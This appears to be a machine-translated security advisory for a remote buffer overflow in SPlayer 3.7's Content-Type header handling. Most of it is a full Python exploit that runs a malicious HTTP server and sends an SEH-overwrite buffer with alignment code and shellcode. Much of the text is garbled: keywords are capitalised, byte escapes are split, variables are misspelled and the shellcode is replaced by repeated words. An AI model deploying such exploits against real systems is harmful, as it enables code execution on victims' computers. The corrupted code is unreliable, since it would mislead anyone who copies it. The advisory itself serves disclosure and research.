SPlayer "Content-Type" Header Remote Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Splayer 3.7
Description:
--------------------------------------------------------------------------------
Bugtraq id: 47721

SPlayer is a simple multimedia player,

The SPlayer has a remote buffer overflow vulnerability when processing the "Content-Type" header. Remote attackers can exploit this vulnerability to run arbitrary code or cause a denial of service in the affected application.

<* Source: xsploitedsec
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python
# Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit
# Date: May 04,201 1
# Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>
# Software Link: http://www.splayer.org/index.en.html
# Versions: <= 3.7 (build 2055)
# Tested On: WinXP SP3 Eng/SPlayer 3.7 build 2055 (English Locale)
# CVE: N/

# Software Descripton:
# "SPlayer is a simple and free high performance all-in-one audio and video player that was designed
# In order to help you easily view your videos, images and listen to your music files. SPlayer lets
# You enjoy your favorite music and movies"

# Vulnerability information:
# SPlayer is vulnerable to a remote buffer overflow when parsing a specially crafted HTTP header from
# A remote server. The bug is triggered due to the "Content-Type:" field being passed to the wcstol ()
# Function, prior to any bounds checking. This coshould allow an attacker to trick a remote user
# Opening a specially crafted playlist file, containing a URL pointing to a malicious web server.

# Usage:

# Method 1:
#1. Execute this script...
#2. Launch SPlayer, right click and click open-> URL (ctrl + u )...
#3. Input the server URL and Click OK...
#4. Boom! /Calc...

# Method 2:
#1. Execute this script...
#2. Launch SPlayer and click Open (ctrl + o )...
#3. Browse to any playlist file (m3u, pls) It must contain the server URL! ...
#4. Click Open...
#5. [wait til URL is loaded], Boom! /Calc...

# URL Examples:
# Http: // serverip/anyfilename. avi
# Http: // serverip: port/anyfilename. avi
# Http: // serverip /*

# Shouts:
# Edb-team, corelanc0d3r/corelan-team, kaotix, sheep, deca, nemesis

Import sys
Import socket

Bindaddr = "0.0.0.0"
Bindport = 1234
Banner = "Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1"

# Calc shellcode/alpha_upper
Calcshell = (# Plenty of room for lots of shellcode here
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"D080Q2U0C000E0Z1111KPA ")

Class Client ():

Def about (self ):
About = "\ r ======================================== ===============================================================\ n"
About + = "PoC Title: Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow \ n"
About + = "Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com> \ r \ n"
About + = "======================================== ========================================"
Print about

Def run (self ):
Pre = "HTTP/1.1 200 OK \ r \ n"
Pre + = "Date: Tue, 03 May 2011 04:18:38 GMT \ r \ n"
Pre + = "Server:" + banner + "\ r \ n"
Pre + = "Last-Modified: Sun, 03 Jul 2005 18:39:44 GMT \ r \ n"
Pre + = "ETag:" "1f3814d-e6800-3fb032cba1c00" "\ r \ n"
Pre + = "Accept-Ranges: bytes \ r \ n"
Pre ++ = "Content-Length: 99999 \ r \ n"
Pre + = "Connection: close \ r \ n"
Pre + = "Content-Type :"

# Begin edevil buffer
Edevil = "\ x41" * 2073
Edevil + = "\ x61 \ x73" # popad/nop align

Edrop + = "\ x25 \ x73" # SE handler-ppr/splayer.exe [0x00730025]

# Close the blinds
Edevil + = "\ x73" # nop/align
Edevil + = "\ x55" # push ebp
Edevil + = "\ x73" # nop/align
Edevil + = "\ x58" # pop eax
Edevil + = "\ x73" # nop/align

# Align to EAX/execute shellcode
Edevil + = "\ x05 \ x19 \ x11" # add eax, 0x11001900
Edevil + = "\ x73" # nop/align
Edevil + = "\ x2d \ x11 \ x11" # sub eax, 0x11001100
Edevil + = "\ x73" # nop/align
Edevil + = "\ x50" # push eax
Edevil + = "\ x73" # nop/align
Edevil + = "\ xc3" # ret

Edevil + = "\ x46" * 1004 # align shellcode-> EAX
# End edevil buffer

Padding = "\ x44" * (30000-len (pre + edevil + calcshell) + "\ r \ n"
Payload = pre + edevil + calcshell + padding

Try:
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. bind (bindaddr, bindport ))
S. listen (5)
Print "[+] Listening for incoming connections on port: % d" % bindport + "..."
Except t:
Print "[!] Error binding socket, is the port already in use? \ R \ n [-] Exiting"
Sys. exit ()

# Note: SPlayer seems to connect/send a GET request twice every time a URL is processed
# And it crashes after the second request

While 1:
(Clientsock, address) = s. accept ()
Print "[*] New connection from", address [0]
Clientsock. recv (1024)
Sent = clientsock. send (payload)
Print "[+] Payload sent successfully [size: % d bytes]" % sent
Sent = 0
Print "[-] Closing connection to", address [0]
Clientsock. close ()

If _ name _ = "_ main __":
Client (). about ()
Client (). run ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Splayer
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.splayer.org/index.en.html